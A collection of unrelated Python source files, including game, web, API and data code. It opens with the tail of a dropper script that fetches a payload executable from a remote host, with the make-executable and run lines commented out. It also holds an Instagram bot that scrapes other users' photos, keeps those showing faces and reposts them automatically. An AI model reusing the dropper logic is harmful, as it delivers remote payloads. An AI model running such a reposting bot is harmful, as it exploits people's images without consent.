if opts.payload is None:
opts.payload = raw_input("Name of the output file: ")
drop(opts.host, opts.port, opts.image, opts.payload)
#set executable
#os.chmod(opts.payload, 0777 )
#Launch the executable
#os.system( './'+payload )
if __name__ == '__main__':
main()
| StarcoderdataPython |
6587336 | <filename>Project1/mapGenerator.py
import pygame
import time
import random
import os
from datetime import datetime
from os import listdir
from pygame.locals import *
from button import *
from WFC import *
class MapGenerator:
def __init__(self, game):
self.game = game
self.screen = game.screen
self.images = []
self.button1 = Button((600,550,105,25), 'Regenerate', self.game)
self.button2 = Button((600,20,105,25), 'Save', self.game)
def init(self, images):
location = [(10,70), (210,70), (410, 70), (610, 70), (10, 300), (210,300), (410, 300), (610, 300)]
index = 0
self.images = []
for image in images:
mode = image.mode
size = image.size
data = image.tobytes()
tile = pygame.image.fromstring(data, size, mode)
tmp = {}
tmp['tile'] = pygame.transform.scale(tile, (180,180))
tmp['rect'] = pygame.Rect((location[index][0],location[index][1],180,180))
tmp['location'] = location[index]
tmp['selected'] = False
self.images.append(tmp)
index += 1
# def process(self, imagefiles):
def draw(self):
self.button1.draw()
self.button2.draw()
for image in self.images:
self.screen.blit(image['tile'], image['rect'])
if image['selected'] == True:
pygame.draw.rect(self.screen, Color('red'), image['rect'], 5)
def get_event(self, event):
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
for image in self.images:
if image['rect'].collidepoint(pygame.mouse.get_pos()):
# print(image['name'])
image['selected'] = not image['selected']
if self.button1.rect.collidepoint(pygame.mouse.get_pos()):
self.button1updata()
if self.button2.rect.collidepoint(pygame.mouse.get_pos()):
self.button2updata()
def button1updata(self):
selectedImage = self.game.constrainGenerator.selectedImage
constraints = self.game.constrainGenerator.constraints
WFC = WaveFunctionCollaps(selectedImage, constraints)
res = []
for i in range(8):
res.append(WFC.run())
self.init(res)
def button2updata(self):
for image in self.images:
if image['selected'] == True:
time = str(datetime.now())
name = time + str(image['location'])
pygame.image.save(image['tile'], f"./ResultMap/{name}.png")
if __name__ == "__main__":
print('hello')
datetime = datetime.now()
print(type(str(datetime)))
# mapgenerator = MapGenerator() | StarcoderdataPython |
11296607 | import numpy as np
import cv2 as cv
import base64
import time
import zmq
import IO
TIMEOUT = 1000
def initialize_socket(port="555"):
global socket
print("[ZMQ SERVER] Socket initializing...", end="")
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.setsockopt(zmq.RCVTIMEO, TIMEOUT)
socket.bind("tcp://*:{}".format(port))
print("\tOK")
def encode_image(img):
ret, encimg = cv.imencode(".jpg", img)
b64 = base64.b64encode(encimg)
return b64
def null_frame():
nullimg = np.zeros((480, 640, 3))
enc_img = encode_image(nullimg)
return enc_img
def send_frame(img):
st = time.time()
while (time.time() - st) < TIMEOUT:
try:
request = socket.recv()
if not request == b"<GET>":
print("[SYNC FAILURE] Trying to synchronise...", end="")
if request == b"<ACK>":
socket.send(b"<OK>")
print("\tFIXED")
return None
elif request == b"<BOOT>":
print("FIXING")
print("[CONNECTION] Client seems restarted. Resynchronising...")
socket.send(b"<BOOT_CONFIRM>")
#send_frame(img)
return None
else:
print("[BAD REQUEST]", request)
enc_img = encode_image(img)
socket.send(enc_img)
response = socket.recv()
if not response == b"<ACK>":
print("[BAD RESPONSE] Trying to fix...", end="")
if response == b"<BOOT>":
socket.send(b"<BOOT_CONFIRM>")
print("\tFIXED")
return None
elif response == b"<GET>":
print("\tNull sending")
socket.send(null_frame())
res = socket.recv()
if not res == b"<ACK>": print("[FUCK] It's screwed up.")
socket.recv(b"<OK>")
return None
else:
print("[BAD RESPONSE]", response)
return None
socket.send(b"<OK>")
return True
except zmq.error.Again:
print("[CONNECTION] Connection lost.")
print("[TIMEOUT] Unable to reach client.")
| StarcoderdataPython |
11383208 | from dataclasses import dataclass
from typing import List, Optional, Any
@dataclass
class LoginFormData:
CID: int
SID: int
PID: int
CN: int
SFT: int
SCID: int
@dataclass
class Mark:
assignmentId: int
studentId: int
mark: Optional[int]
dutyMark: bool
@dataclass
class SubjectGroup:
id: int
name: str
@dataclass
class User:
id: int
fio: str
nickName: str
@dataclass
class Teacher:
id: int
name: str
@dataclass
class Attachment:
id: int
name: Optional[str]
originalFileName: str
description: Optional[str]
@dataclass
class LessonAttachments:
assignmentId: int
attachments: List[Attachment]
answerFiles: List[Any]
@dataclass
class AssignmentInfo:
id: int
assignmentName: str
activityName: Optional[str]
problemName: Optional[str]
subjectGroup: SubjectGroup
teacher: Teacher
productId: Optional[int]
isDeleted: bool
weight: int
date: str
description: str
attachments: List[Attachment]
@dataclass
class Assignment:
mark: Optional[Mark]
id: int
typeId: int
assignmentName: str
dueDate: str
weight: int
@dataclass
class Lesson:
classmeetingId: int
day: str
number: int
room: Optional[str]
relay: int
startTime: Optional[str]
endTime: Optional[str]
subjectName: Optional[str]
assignments: Optional[List[Assignment]]
@dataclass
class Day:
date: str
lessons: List[Lesson]
@dataclass
class Diary:
weekStart: str
weekEnd: str
weekDays: List[Day]
termName: str
className: str
@dataclass
class Announcement:
description: str
postDate: str
deleteDate: Optional[str]
author: User
attachments: List[Attachment]
id: int
name: str
recipientInfo: Optional[str]
ASSIGNMENT_TYPES = {
1: "Практическая работа",
2: "Тематическая работа",
3: "Домашнее задание",
4: "Контрольная работа",
5: "Самостоятельная работа",
6: "Лабораторная работа",
7: "Проект",
8: "Диктант",
9: "Реферат",
10: "Ответ на уроке",
11: "Сочинение",
12: "Изложение",
13: "Зачёт",
14: "Тестирование",
16: "Диагностическая контрольная работа",
17: "Диагностическая работа",
18: "Контрольное списывание",
21: "Работа на уроке",
22: "Работа в тетради",
23: "Ведение рабочей тетради",
24: "Доклад/Презентация",
25: "Проверочная работа",
26: "Чтение наизусть",
27: "Пересказ текста",
29: "Предметный диктант",
31: "Дифференцированный зачет",
32: "Работа с картами",
33: "Экзамен",
34: "Изложение с элементами сочинения",
35: "Контроль аудирования",
36: "Контроль грамматики",
37: "Контроль лексеки",
38: "Устный развернутый ответ",
}
| StarcoderdataPython |
1612115 | import os
from django.conf import settings
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'src.settings')
django_asgi_app = get_asgi_application()
"""Imports only after get_asgi_application() and env.
Excluded error like:
django.core.exceptions.AppRegistryNotReady: Apps aren't loaded yet.
"""
from channels.routing import ProtocolTypeRouter, URLRouter
from channels.security.websocket import OriginValidator
from sentry_sdk.integrations.asgi import SentryAsgiMiddleware
from chat.middleware import AuthMiddlewareStack
from chat.routing import websocket_urlpatterns as chat_urlpatterns
application = SentryAsgiMiddleware(
ProtocolTypeRouter(
{
"http": django_asgi_app,
'websocket': AuthMiddlewareStack(
URLRouter(
chat_urlpatterns,
)
),
}
)
)
| StarcoderdataPython |
1898966 | #! /usr/bin/python3
"""
InstabotAI - Instagram Bot With Face Detection
Intro:
This bot autoscrape users from variable output -l
if a face is detected it will repost, repost to
stories, send DM to users, like and comment that
photo. If no face is detected in image it will
scrape the next profile in list.
Github:
https://github.com/instagrambot/instabotai
Workflow:
Repost best photos from users to your account
By default bot checks username_database.txt
The file should contain one username per line!
"""
import face_recognition
import instagram_scraper as insta
from instabot import Bot, utils
import argparse
import os
import sys
import json
import time
from tqdm import tqdm
import logging
from random import randint
# Config
image_comment = "Wow nice picture, i have just reposted it"
# Logging Output default settings
logging.basicConfig(stream=sys.stdout, format='',
level=logging.INFO, datefmt=None)
log = logging.getLogger(__name__)
# Parse arguments from Cli into variables
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-u', type=str, help="username")
parser.add_argument('-p', type=str, help="password")
parser.add_argument('-l', type=str, help="therock,kimkardashian")
parser.add_argument('-t', type=str, help="#hotgirls,#models,#like4like")
parser.add_argument('-proxy', type=str, help="proxy")
parser.add_argument('-file', type=str, help="users filename")
parser.add_argument('-amount', type=int, help="amount", default=1)
parser.add_argument('users', type=str, nargs='*', help='users')
args = parser.parse_args()
InstaUsername = args.u
## Seperate users into list file
def help_output():
if not args.u:
log.info('python3 example.py -u for username -p password -l therock,kimkardashian -t "#like4like#follow4follow"')
sys.exit()
help_output()
userlist = args.l
instagramtags = args.t
with open('instaprofiles.txt', 'w') as f:
if f:
userlist = userlist.replace(",", "\n")
f.write(userlist)
username = InstaUsername
# Open Userdb and put them into a list also write your username to database
def open_profiles():
# Profiles to scrape and repost
global insta_profiles
insta_profiles = []
with open("instaprofiles.txt") as f:
insta_profiles = f.read().splitlines()
f.close()
# Output userenames in a txt file
global userdb
userdb = '\n'.join(insta_profiles)+'\n'
with open('userdb.txt', 'w') as f:
f.write(userdb)
global username
time.sleep(1)
with open('username_database.txt', 'w') as f:
f.write(username)
number_last_photos = 3
x = 0
sys.path.append(os.path.join(sys.path[0], '../'))
USERNAME_DATABASE = 'username_database.txt'
POSTED_MEDIAS = 'posted_medias.txt'
def repost_best_photos(bot, users, amount=1):
medias = get_not_used_medias_from_users(bot, users)
medias = sort_best_medias(bot, medias, amount)
for media in tqdm(medias, desc='Reposting photos'):
repost_photo(bot, media)
# Sort best media this is not executed yet
def sort_best_medias(bot, media_ids, amount=1):
best_medias = [bot.get_media_info(media)[0] for media in
tqdm(media_ids, desc='Getting media info')]
best_medias = sorted(best_medias, key=lambda x:
(x['like_count'], x['comment_count']), reverse=True)
return [best_media['pk'] for best_media in best_medias[:amount]]
def get_not_used_medias_from_users(bot, users=None,
users_path=USERNAME_DATABASE):
if not users:
users = utils.file(users_path).list
users = map(str, users)
total_medias = []
for user in users:
medias = bot.get_user_medias(user, filtration=False)
medias = [media for media in medias if not
exists_in_posted_medias(media)]
total_medias.extend(medias)
return total_medias
def exists_in_posted_medias(new_media_id, path=POSTED_MEDIAS):
medias = utils.file(path).list
return str(new_media_id) in medias
def update_posted_medias(new_media_id, path=POSTED_MEDIAS):
medias = utils.file(path)
medias.append(str(new_media_id))
return True
def repost_photo(bot, new_media_id, path=POSTED_MEDIAS):
if bot.upload_photo(instapath, tags):
update_posted_medias(new_media_id, path)
logging.info('Media_id {0} is saved in {1}'
.format(new_media_id, path))
# Instagram image scraper
def InstaImageScraper():
imgScraper = insta.InstagramScraper(usernames=[insta_profiles[x]],
maximum=number_last_photos,
media_metadata=True, latest=True,
media_types=['image'])
imgScraper.scrape()
print("image scraping is running, please wait 50 seconds.")
# Instagram manipulate image and repost them
# While x is less than instaprofiles loop this
def instascraper(bot, new_media_id, path=POSTED_MEDIAS):
InstaImageScraper()
time.sleep(randint(1, 5))
global x
while x < len(insta_profiles):
try:
# Open insta_profiles[x] and it's scraped
# json file take first image location
with open(insta_profiles[x]
+ '/' + insta_profiles[x] + '.json', 'r') as j:
global scraped_user
scraped_user = insta_profiles[x]
json_data = json.load(j)
time.sleep(randint(1, 10))
newstr = (json_data["GraphImages"][0]["display_url"])
# Output media id of image
media_id = (json_data["GraphImages"][0]["id"])
log.info("Found media id: " + media_id)
time.sleep(randint(5, 10))
logging.info("image string generated " + newstr)
time.sleep(randint(1, 5))
imgUrl = newstr.split('?')[0].split('/')[-1]
global instapath
instapath = insta_profiles[x] + '/' + imgUrl
logging.info("Found Instagram Path to Image: " + instapath)
time.sleep(randint(1, 5))
global tags
tags = f'''@{insta_profiles[x]} {instagramtags}'''
# Execute Face Detection
# Locate Face On image scraped
image = face_recognition.load_image_file(instapath)
face_locations = face_recognition.face_locations(image)
# If no face located scrape the next profile
if not face_locations:
log.info("There is no Face Detected scraping next profile")
x += 1
log.info(scraped_user)
time.sleep(randint(5, 10))
instascraper(bot, new_media_id, path=POSTED_MEDIAS)
else:
log.info("There is a Face Detected scraping and posting this image")
log.info(scraped_user)
time.sleep(randint(5, 10))
log.info("Media Id:" + str(media_id))
log.info("Face Location: " + str(face_locations))
log.info("Path to image: " + instapath)
# Append username info to csv file
try:
with open(f'{username}.tsv', 'a+') as f:
f.write(str(saveStats))
with open(f'{username}.tsv', 'r') as f:
last_line = f.readlines()[-2].replace("False", "")
log.info("Date - Time - Followers - Following - Posts")
log.info(last_line)
# Write username tsv file if it does not exist
except:
with open(f'{username}.tsv', 'w+') as f:
f.write(str(saveStats))
with open(f'{username}.tsv', 'r') as f:
last_line = f.readlines()[-1]
log.info("Date - Time - Followers - Following - Posts")
log.info(last_line)
# Append username info to csv file
try:
with open(f'{username}_posted.tsv', 'a+') as f:
f.write(str(imgUrl + "\n"))
with open(f'{username}_posted.tsv', 'r') as f:
last_line = f.readlines()[-1]
with open(f'{username}_posted.tsv', 'r') as f:
all_lines = f.readlines()[0:-2]
all_lines = (str(all_lines))
log.info("Posted Media")
log.info(last_line)
# if imgurl is in file username_posted scrape next profile
if str(imgUrl) in str(all_lines):
try:
log.info("Image found in database scraping next profile")
x += 1
log.info("image found of: " + scraped_user)
time.sleep(randint(5, 10))
instascraper(bot, new_media_id, path=POSTED_MEDIAS)
except:
log.info("image found of: " + scraped_user)
x += 1
time.sleep(randint(5, 20))
instascraper(bot, new_media_id, path=POSTED_MEDIAS)
# Write username tsv file if it does not exist
except:
with open(f'{username}_posted.tsv', 'a+') as f:
f.write(str(imgUrl + "\n"))
with open(f'{username}_posted.tsv', 'r') as f:
last_line = str(f.readlines()[-1])
all_lines = str(f.readlines()[0:-2])
log.info("Posted media")
logging(last_line)
if imgUrl in all_lines:
log.info("Image found in database scraping next profile")
x += 1
log.info("image of " + scraped_user)
time.sleep(randint(5, 20))
instascraper(bot, new_media_id, path=POSTED_MEDIAS)
# Execute the repost function
time.sleep(randint(20, 40))
# Repost image as story
time.sleep(randint(20, 50))
bot.upload_story_photo(instapath)
log.info("Photo Uploaded to Story")
# Send private DM to user it reposted
# bot.send_messages("Hi i just reposted your photo", user_id)
time.sleep(randint(20, 60))
print(user_id)
# os.remove("posted_medias.txt")
log.info("Wait 2200 - 2600 sec for next repost")
time.sleep(randint(2200, 2800))
except:
log.info("image set to private " + scraped_user)
x += 1
time.sleep(randint(5, 20))
instascraper(bot, new_media_id, path=POSTED_MEDIAS)
x += 1
x = 0
time.sleep(randint(10, 30))
instascraper(bot, new_media_id, path=POSTED_MEDIAS)
# All main stuff gets executed
open_profiles()
time.sleep(randint(5, 30))
bot = Bot()
#bot.login(username=InstaUsername)
bot.login(username=args.u, password=args.p)
time.sleep(randint(10, 30))
user_id = bot.get_user_id_from_username(args.u)
username = bot.get_username_from_user_id(user_id)
#print(f"Welcome {username} your userid is {user_id}")
saveStats = bot.save_user_stats(username)
users = None
if args.users:
users = args.users
elif args.file:
users = utils.file(args.file).list
instascraper(bot, users, args.amount)
| StarcoderdataPython |
9793843 | <filename>cifar10/models/__init__.py
from .wideresnet import *
from .resnet import *
from .dpn import *
from .se_resnet import *
from .se_resnext import *
from .pre_resnet import *
from .resnext import *
from .resnext_101_32x4d import *
from .resnext_50_32x4d import *
from .resnext_101_64x4d import *
from .wrn_50_2f import *
from .nasnet import *
from .inceptionresnetv2 import *
from .inceptionv4 import *
| StarcoderdataPython |
215226 | <gh_stars>10-100
import pandas as pd
from pyam import IamDataFrame
def get_netzero_data(df, meta, default_year):
"""Reformat an IamDataFrame selecting the year via a meta column"""
lst = []
# iterate over scenarios and retrieve timeseries data for the year given by `meta`
for model, scenario in df.index:
try:
y = int(df.meta.loc[(model, scenario), meta])
except ValueError:
y = default_year
_df = df.filter(model=model, scenario=scenario)
_df.interpolate(y, inplace=True)
lst.append(_df.filter(year=y)._data)
# concatenate single-year timeseries data and cast to IamDataFrame
data = pd.concat(lst).reset_index()
data.year = 0
return IamDataFrame(data) | StarcoderdataPython |
4932395 | <reponame>private-yusuke/Competitive-Programming
A, B, C = map(int, input().split())
if A==B: print(C)
elif B==C: print(A)
else: print(B) | StarcoderdataPython |
4966548 | import itertools
from microbenchmarks._metric import MetricType
from microbenchmarks._utils import get_ti_arch, tags2name
import taichi as ti
class Funcs():
def __init__(self):
self._funcs = {}
def add_func(self, tag_list: list, func):
self._funcs[tags2name(tag_list)] = {'tags': tag_list, 'func': func}
def get_func(self, tags):
for name, item in self._funcs.items():
if set(item['tags']).issubset(tags):
return item['func']
return None
class BenchmarkPlan:
def __init__(self, name='plan', arch='x64', basic_repeat_times=1):
self.name = name
self.arch = arch
self.basic_repeat_times = basic_repeat_times
self.info = {'name': self.name}
self.plan = {} # {'tags': [...], 'result': None}
self.items = []
self.funcs = Funcs()
def create_plan(self, *items):
self.items = list(items)
items_list = [[self.name]]
for item in self.items:
items_list.append(item.get_tags())
self.info[item.name] = item.get_tags()
case_list = list(itertools.product(*items_list)) #items generate cases
for tags in case_list:
self.plan[tags2name(tags)] = {'tags': tags, 'result': None}
def add_func(self, tag_list, func):
self.funcs.add_func(tag_list, func)
def run(self):
for case, plan in self.plan.items():
tag_list = plan['tags']
MetricType.init_taichi(self.arch, tag_list)
_ms = self.funcs.get_func(tag_list)(self.arch,
self.basic_repeat_times,
**self._get_kwargs(tag_list))
plan['result'] = _ms
print(f'{tag_list}={_ms}')
ti.reset()
rdict = {'results': self.plan, 'info': self.info}
return rdict
def _get_kwargs(self, tags):
kwargs = {}
tags = tags[1:] # tags = [case_name, item1_tag, item2_tag, ...]
for item, tag in zip(self.items, tags):
kwargs[item.name] = item.impl(tag)
return kwargs
| StarcoderdataPython |
4997182 | from monitor.watcher import Watcher
import time
try:
import configparser
except ImportError:
import ConfigParser as configparser
def multi_watch(args):
gens = []
config = configparser.ConfigParser()
config.read('conf/monitor.conf')
for name in config.sections():
print('-----[%s]-----' % name)
watch_dict = {}
for key, value in config[name].items():
print("%s: %s" % (key, value))
watch_dict[key] = value
excludes = watch_dict['excludes'].split('|') if watch_dict.get('excludes') else None
gen = Watcher(watch_dict['path'], excludes=excludes, project=name).auto_reload(watch_dict['action'])
gens.append(gen)
while True:
for g in gens:
next(g)
time.sleep(1)
| StarcoderdataPython |
5170123 | <filename>api/staff/migrations/0007_auto_20211219_2259.py
# Generated by Django 3.2.10 on 2021-12-19 22:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('staff', '0006_auto_20211218_2005'),
]
operations = [
migrations.RenameField(
model_name='rank',
old_name='name',
new_name='title',
),
migrations.AddField(
model_name='rank',
name='department',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='ranks', to='staff.department'),
preserve_default=False,
),
]
| StarcoderdataPython |
99594 | from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from pyramid.response import Response
from pyramid.view import view_config
import pyramid.httpexceptions as exc
import re
from pyramid.request import Request
from _pybgpstream import BGPStream, BGPRecord, BGPElem
from datetime import time, timedelta
import json
#@view_config(renderer='json')
def data(request):
import pdb; pdb.set_trace()
#for prameter in request.GET.keys():
collector, start, end = 0
if request.GET.has_key("route_collector"):
collector=request.GET["route_collector"]
if request.GET.has_key('timespan_start'):
start=request.GET["timespan_start"]
if request.GET.has_key('timespan_end'):
end=request.GET["timespan_end"]
# create a new bgpstream instance
stream = BGPStream()
# select the data source
# on the CLI it works this way $ bgpreader -d sqlite -o db-file,ULG.sqlite -w 1477000000,1777360000
stream.set_data_interface("sqlite")
print("collector from URL is: " + collector)
# FIXME Use the collector name
stream.set_data_interface_option('db-file', collector +'.sqlite')
# create a reusable bgprecord instance
rec = BGPRecord()
#if start >= 0 and end >= 0
# do something
#else
# do the default timerange
return response
if __name__ == '__main__':
config = Configurator()
config.add_route('bgpread', '/peers/')
config.add_view(data, route_name='bgpread', renderer='json')
app = config.make_wsgi_app()
server = make_server('0.0.0.0', 8080, app)
server.serve_forever()
| StarcoderdataPython |
11310073 | <gh_stars>1-10
"""GitHub organization model."""
from .user import GitHubBaseUserModel
class GitHubOrganizationModel(GitHubBaseUserModel):
"""GitHub organization model."""
| StarcoderdataPython |
166061 | <gh_stars>1-10
from w3lib.http import basic_auth_header
from scrapy.utils.project import get_project_settings
class ProxyMiddleware(object):
def process_request(self, request, spider):
settings = get_project_settings()
request.meta['proxy'] = settings.get('PROXY_HOST') + ':' + settings.get('PROXY_PORT')
request.headers["Proxy-Authorization"] = basic_auth_header(settings.get('PROXY_USER'), settings.get('PROXY_PASSWORD'))
spider.log('Proxy : %s' % request.meta['proxy'])
| StarcoderdataPython |
1792434 | import sys
# sys.stdin = open("in.txt", 'r')
t = int(input())
for i in range(t):
s = list(str(input()))
s.sort(reverse=True)
print("".join(s))
| StarcoderdataPython |
345667 | <filename>setup.py
from setuptools import setup, find_packages
setup(
name="data_flow",
version="0.3",
description="A system transform data consistently and easily",
packages=["dataflow"],
url='https://github.com/LordFeratum/DataFlow',
download_url='https://github.com/LordFeratum/DataFlow/archive/0.3.tar.gz',
author="<NAME>",
author_email="<EMAIL>"
)
| StarcoderdataPython |
8152565 | __version__ = "0.1"
__author__ = "Julin"
import argparse
from pextn import pextn, UnknownExtension
parser = argparse.ArgumentParser(
prog="pextn",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="A simple, lazy utility to display information about a file extension"
)
parser.add_argument(
'--version',
action='version',
version='%(prog)s ' + __version__
)
parser.add_argument("extension", help="Extension")
args = parser.parse_args()
try:
extn_info_lists = pextn(args.extension)
print(f"Extension: {args.extension}")
print("-" * (len("Extension: ") + len(args.extension)))
for info_list in extn_info_lists:
print(f"{info_list[0]}")
if info_list[1]:
print(f"Used by: {info_list[1]}")
print()
except UnknownExtension:
print(f"Not sure what '{args.extension}' is...")
| StarcoderdataPython |
5145965 | <filename>Vector.py
import math
import copy
class Vector(list):
""" Vector.py
6/24/2009 by <NAME>
simple list-based vector class
Notes:
- Inspired by http://code.activestate.com/recipes/52272/
- Supports 2D and 3D vectors
- Constructor takes either a tuple or a list
- Has properties x, y and z for ease of use
- Allows for Vector add/mul with a scalar or another Vector
"""
def __init__(self, *vec):
if len(vec) == 0:
super(Vector, self).__init__([0.0, 0.0, 0.0])
else:
if type(vec[0]) is list:
super(Vector, self).__init__(vec[0])
else:
if type(vec) is tuple:
super(Vector, self).__init__([i for i in vec])
def __add__(self, other):
if type(other) is list or type(other) is Vector:
return Vector(map(lambda x, y: x + y, self, other))
else:
return Vector([self[i] + other for i in range(len(self))])
def __sub__(self, other):
if type(other) is list or type(other) is Vector:
return Vector(map(lambda x, y: x - y, self, other))
else:
return Vector([self[i] + other for i in range(len(self))])
def __mul__(self, other):
if type(other) is list or type(other) is Vector:
return Vector(map(lambda x, y: x * y, self, other))
else:
return Vector([self[i] * other for i in range(len(self))])
# Properties of X, Y, Z for convenience
def __GetX(self):
return self[0]
def __SetX(self, value):
self[0] = value
x = property(fget=__GetX, fset=__SetX, doc="what?")
def __GetY(self):
return self[1]
def __SetY(self, value):
self[1] = value
y = property(fget=__GetY, fset=__SetY, doc="what?")
def __GetZ(self):
return self[2]
def __SetZ(self, value):
self[2] = value
z = property(fget=__GetZ, fset=__SetZ, doc="what?")
def out(self):
print self
def Normalized(self):
if len(self) > 3 or len(self) < 2:
raise Exception("Normalization not supported on this Vector")
temp = copy.deepcopy(self)
if len(self) == 2:
length = math.sqrt(temp[0] * temp[0] + temp[1] * temp[1])
temp[0] /= length
temp[1] /= length
else:
length = math.sqrt(temp[0] * temp[0] + temp[1] * temp[1] + temp[2] * temp[2])
temp[0] /= length
temp[1] /= length
temp[2] /= length
return temp
def Normalize(self):
n = self.Normalized()
for i in range(len(n)):
self[i] = n[i]
if __name__ == "__main__":
a = Vector()
a = Vector([2.0, 2.0, 2.0])
a.x = 4.0
b = a * Vector(3, 3, 3)
c = Vector(2.0, 2.0)
d = Vector(9.0, 7.0)
dist = d - c
print dist
dist.Normalize()
print dist
print c + dist
| StarcoderdataPython |
4816567 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import dash
import dash_core_components as dcc
import dash_html_components as html
import pandas as pd
from dash.dependencies import Input, Output
df0 = pd.read_csv('https://gist.githubusercontent.com/chriddyp/c78bf172206ce24f77d6363a2d754b59/raw/c353e8ef842413cae56ae3920b8fd78468aa4cb2/usa-agricultural-exports-2011.csv')
def generate_table(dataframe, max_rows=10):
return html.Table([
html.Thead(
html.Tr([html.Th(col) for col in dataframe.columns])
),
html.Tbody([
html.Tr([
html.Td(dataframe.iloc[i][col]) for col in dataframe.columns
]) for i in range(min(len(dataframe), max_rows))
])
])
df = pd.read_csv(
'https://gist.githubusercontent.com/chriddyp/5d1ea79569ed194d432e56108a04d188/raw/a9f9e8076b837d541398e999dcbac2b2826a81f8/gdp-life-exp-2007.csv')
df1 = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/gapminderDataFiveYear.csv')
markdown_text = '''
### Dash and Markdown
Dash apps can be written in Markdown.
Dash uses the [CommonMark](http://commonmark.org/)
specification of Markdown.
Check out their [60 Second Markdown Tutorial](http://commonmark.org/help/)
if this is your first introduction to Markdown!
'''
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
colors = {
'background': '#111111',
'text': '#7FDBFF'
}
app.layout = html.Div(
# style={'backgroundColor': colors['background']},
children=[
html.H1(
children='Hello Dash',
style={
'textAlign': 'center',
# 'color': colors['text']
}),
html.Div(
children='''
Dash: A web application framework for Python.
''',
style={
'textAlign': 'center',
# 'color': colors['text']
}),
dcc.Markdown(children=markdown_text),
dcc.Graph(
id='example-graph-2',
figure={
'data': [
{'x': [1, 2, 3], 'y': [4, 1, 2],
'type': 'bar', 'name': 'SF'},
{'x': [1, 2, 3], 'y': [2, 4, 5],
'type': 'bar', 'name': u'Montréal'},
],
'layout': {
'title': 'Dash Data Visualization',
'plot_bgcolor': colors['background'],
'paper_bgcolor': colors['background'],
'font': {
'color': colors['text']
}
}
}
),
# html.H4(
# children='US Agriculture Exports (2011)'),
# generate_table(df0),
html.Label('Dropdown'),
dcc.Dropdown(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value='MTL'
),
html.Label('Multi-Select Dropdown'),
dcc.Dropdown(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value=['MTL', 'SF'],
multi=True
),
html.Label('Radio Items'),
dcc.RadioItems(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value='MTL'
),
html.Label('Checkboxes'),
dcc.Checklist(
options=[
{'label': 'New York City', 'value': 'NYC'},
{'label': u'Montréal', 'value': 'MTL'},
{'label': 'San Francisco', 'value': 'SF'}
],
value=['MTL', 'SF']
),
html.Label('Text Input'),
dcc.Input(value='MTL', type='text'),
html.Label('Slider'),
dcc.Slider(
min=0,
max=9,
marks={i: 'Label {}'.format(i) if i == 1 else str(i)
for i in range(1, 6)},
value=5,
),
dcc.Graph(
id='life-exp-vs-gdp',
figure={
'data': [
dict(
x=df[df['continent'] == i]['gdp per capita'],
y=df[df['continent'] == i]['life expectancy'],
text=df[df['continent'] == i]['country'],
mode='markers',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
) for i in df.continent.unique()
],
'layout': dict(
xaxis={'type': 'log', 'title': 'GDP Per Capita'},
yaxis={'title': 'Life Expectancy'},
margin={'l': 40, 'b': 40, 't': 10, 'r': 10},
legend={'x': 0, 'y': 1},
hovermode='closest'
)
}
),
dcc.Input(id='my-id',
value='initial value',
type='text'),
html.Div(id='my-div'),
dcc.Graph(id='graph-with-slider'),
dcc.Slider(
id='year-slider',
min=df1['year'].min(),
max=df1['year'].max(),
value=df1['year'].min(),
marks={str(year): str(year) for year in df1['year'].unique()},
step=None
)
],
style={'columnCount': 2}
)
@app.callback(
Output(component_id='my-div', component_property='children'),
[Input(component_id='my-id', component_property='value')]
)
def update_output_div(input_value):
return 'You\'ve entered "{}"'.format(input_value)
@app.callback(
Output('graph-with-slider', 'figure'),
[Input('year-slider', 'value')])
def update_figure(selected_year):
filtered_df = df1[df1.year == selected_year]
traces = []
for i in filtered_df.continent.unique():
df_by_continent = filtered_df[filtered_df['continent'] == i]
traces.append(dict(
x=df_by_continent['gdpPercap'],
y=df_by_continent['lifeExp'],
text=df_by_continent['country'],
mode='markers',
opacity=0.7,
marker={
'size': 15,
'line': {'width': 0.5, 'color': 'white'}
},
name=i
))
return {
'data': traces,
'layout': dict(
xaxis={'type': 'log', 'title': 'GDP Per Capita',
'range': [2.3, 4.8]},
yaxis={'title': 'Life Expectancy', 'range': [20, 90]},
margin={'l': 40, 'b': 40, 't': 10, 'r': 10},
legend={'x': 0, 'y': 1},
hovermode='closest',
transition={'duration': 0},
)
}
if __name__ == '__main__':
app.run_server(debug=True)
| StarcoderdataPython |
114230 | <filename>disparity/helpers.py<gh_stars>1-10
import csv
import math
import time
import json
import numpy as np
from beautifultable import BeautifulTable
from pymongo import MongoClient
class Helper:
def __init__(self,
db_name="WorkerSet100K",
collection_name="workers",
configuration="transparent",
N=50,
f=None,
selected=None,
k=None):
"""
Initializes helper.
:param db_name: name of the database.
:param collection_name: name of the collections.
:param configuration: can be either 'transparent', 'opaque_process', 'opaque_dataset'.
:param N: number of workers to select.
"""
self.db_name = db_name
self.configuration = configuration
self.limit = N
self.collection = self.__get_collection(db_name, collection_name)
self.k = k
self.selected = selected
self.f = f
@staticmethod
def __get_collection(db_name, collection_name):
client = MongoClient()
db = client[db_name]
return db[collection_name]
def __retrieve_simulated_dataset(self):
def convert_to_ranges(worker, year_of_birth=True, years_of_experience=True):
if year_of_birth:
# YearOfBirth are combined categorically on a 10-year basis,
# i.e. 1993 will be considered in the 1990-1999 range
worker["YearOfBirth"] = int(worker["YearOfBirth"] / 10) * 10
if years_of_experience:
# YearsOfExperience are combined categorically on a 5-year basis,
# i.e. 13 will be considered in the 10-14 range
